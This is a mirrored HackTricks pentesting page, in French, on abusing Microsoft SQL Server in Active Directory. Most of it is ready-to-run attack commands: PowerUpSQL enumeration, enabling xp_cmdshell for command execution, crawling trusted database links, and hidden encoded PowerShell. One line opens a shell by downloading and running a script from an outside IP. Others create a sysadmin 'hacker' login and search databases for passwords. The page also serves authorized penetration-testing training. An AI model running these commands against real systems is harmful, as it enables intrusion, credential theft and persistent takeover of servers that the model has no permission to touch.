mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-18 00:53:43 +00:00
181 lines
10 KiB
Markdown
181 lines
10 KiB
Markdown
# Abus MSSQL AD
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
||
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|
||
|
||
## **Énumération / Découverte MSSQL**
|
||
|
||
Le module PowerShell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) est très utile dans ce cas.
|
||
```powershell
|
||
Import-Module .\PowerupSQL.psd1
|
||
```
|
||
### Énumération depuis le réseau sans session de domaine
|
||
```powershell
|
||
# Get local MSSQL instance (if any)
|
||
Get-SQLInstanceLocal
|
||
Get-SQLInstanceLocal | Get-SQLServerInfo
|
||
|
||
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
|
||
#First, you will need a list of hosts to scan
|
||
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10
|
||
|
||
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
|
||
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
|
||
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
|
||
```
|
||
### Énumération depuis l'intérieur du domaine
|
||
```powershell
|
||
# Get local MSSQL instance (if any)
|
||
Get-SQLInstanceLocal
|
||
Get-SQLInstanceLocal | Get-SQLServerInfo
|
||
|
||
#Get info about valid MSQL instances running in domain
|
||
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
|
||
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
|
||
|
||
#Test connections with each one
|
||
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
|
||
|
||
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
|
||
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
|
||
|
||
# Get DBs, test connections and get info in oneliner
|
||
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
|
||
```
|
||
## Abus de base de données MSSQL
|
||
|
||
### Accéder à la base de données
|
||
```powershell
|
||
#Perform a SQL query
|
||
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
|
||
|
||
#Dump an instance (a lotof CVSs generated in current dir)
|
||
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
|
||
|
||
# Search keywords in columns trying to access the MSSQL DBs
|
||
## This won't use trusted SQL links
|
||
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
|
||
```
|
||
### MSSQL RCE
|
||
|
||
Il est peut-être également possible d'**exécuter des commandes** à l'intérieur de l'hôte MSSQL.
|
||
```powershell
|
||
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
|
||
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
|
||
```
|
||
Vérifiez sur la page mentionnée dans la **section suivante comment faire cela manuellement.**
|
||
|
||
### Astuces de base de piratage MSSQL
|
||
|
||
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
|
||
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
|
||
{% endcontent-ref %}
|
||
|
||
## Liens de confiance MSSQL
|
||
|
||
Si une instance MSSQL est approuvée (lien de base de données) par une autre instance MSSQL. Si l'utilisateur dispose de privilèges sur la base de données approuvée, il pourra **utiliser la relation de confiance pour exécuter des requêtes également dans l'autre instance**. Ces liens peuvent être enchaînés et à un moment donné, l'utilisateur pourrait être en mesure de trouver une base de données mal configurée où il peut exécuter des commandes.
|
||
|
||
**Les liens entre les bases de données fonctionnent même à travers les relations de forêt.**
|
||
|
||
### Abus de Powershell
|
||
```powershell
|
||
#Look for MSSQL links of an accessible instance
|
||
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
|
||
|
||
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
|
||
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
|
||
|
||
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
|
||
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
|
||
|
||
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
|
||
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
|
||
|
||
#Obtain a shell
|
||
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
|
||
|
||
#Check for possible vulnerabilities on an instance where you have access
|
||
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
|
||
|
||
#Try to escalate privileges on an instance
|
||
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
|
||
|
||
#Manual trusted link queery
|
||
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
|
||
## Enable xp_cmdshell and check it
|
||
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
|
||
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
|
||
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
|
||
## If you see the results of @@selectname, it worked
|
||
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
|
||
```
|
||
### Metasploit
|
||
|
||
Vous pouvez facilement vérifier les liens de confiance en utilisant Metasploit.
|
||
```bash
|
||
#Set username, password, windows auth (if using AD), IP...
|
||
msf> use exploit/windows/mssql/mssql_linkcrawler
|
||
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
|
||
```
|
||
Notez que Metasploit essaiera d'exploiter uniquement la fonction `openquery()` dans MSSQL (donc, si vous ne pouvez pas exécuter de commande avec `openquery()`, vous devrez essayer la méthode `EXECUTE` **manuellement** pour exécuter des commandes, voir plus bas.)
|
||
|
||
### Manuel - Openquery()
|
||
|
||
Depuis **Linux**, vous pouvez obtenir une console shell MSSQL avec **sqsh** et **mssqlclient.py.**
|
||
|
||
Depuis **Windows**, vous pouvez également trouver les liens et exécuter des commandes manuellement en utilisant un **client MSSQL comme** [**HeidiSQL**](https://www.heidisql.com)
|
||
|
||
_Connexion en utilisant l'authentification Windows:_
|
||
|
||
![](<../../.gitbook/assets/image (167) (1).png>)
|
||
|
||
#### Trouver des liens de confiance
|
||
```sql
|
||
select * from master..sysservers
|
||
```
|
||
#### Exécuter des requêtes dans un lien de confiance
|
||
|
||
Exécutez des requêtes via le lien (par exemple : trouvez plus de liens dans la nouvelle instance accessible) :
|
||
```sql
|
||
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
|
||
```
|
||
{% hint style="warning" %}
|
||
Vérifiez où les guillemets simples et doubles sont utilisés, il est important de les utiliser de cette manière.
|
||
{% endhint %}
|
||
|
||
![](<../../.gitbook/assets/image (169).png>)
|
||
|
||
Vous pouvez continuer cette chaîne de liens de confiance indéfiniment manuellement.
|
||
```sql
|
||
# First level RCE
|
||
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
|
||
|
||
# Second level RCE
|
||
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
|
||
```
|
||
Si vous ne pouvez pas effectuer des actions telles que `exec xp_cmdshell` depuis `openquery()`, essayez avec la méthode `EXECUTE`.
|
||
|
||
### Manuel - EXECUTE
|
||
|
||
Vous pouvez également abuser des liens de confiance en utilisant `EXECUTE`:
|
||
```bash
|
||
#Create user and give admin privileges
|
||
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
|
||
```
|
||
## Élévation de privilèges locaux
|
||
|
||
L'utilisateur local **MSSQL** a généralement un type de privilège spécial appelé **`SeImpersonatePrivilege`**. Cela permet au compte d' "usurper un client après l'authentification".
|
||
|
||
Une stratégie que de nombreux auteurs ont élaborée consiste à forcer un service **SYSTEM** à s'authentifier auprès d'un service malveillant ou de l'homme du milieu que l'attaquant crée. Ce service malveillant peut alors usurper le service **SYSTEM** pendant qu'il essaie de s'authentifier.
|
||
|
||
[SweetPotato](https://github.com/CCob/SweetPotato) a une collection de ces différentes techniques qui peuvent être exécutées via la commande `execute-assembly` de Beacon.
|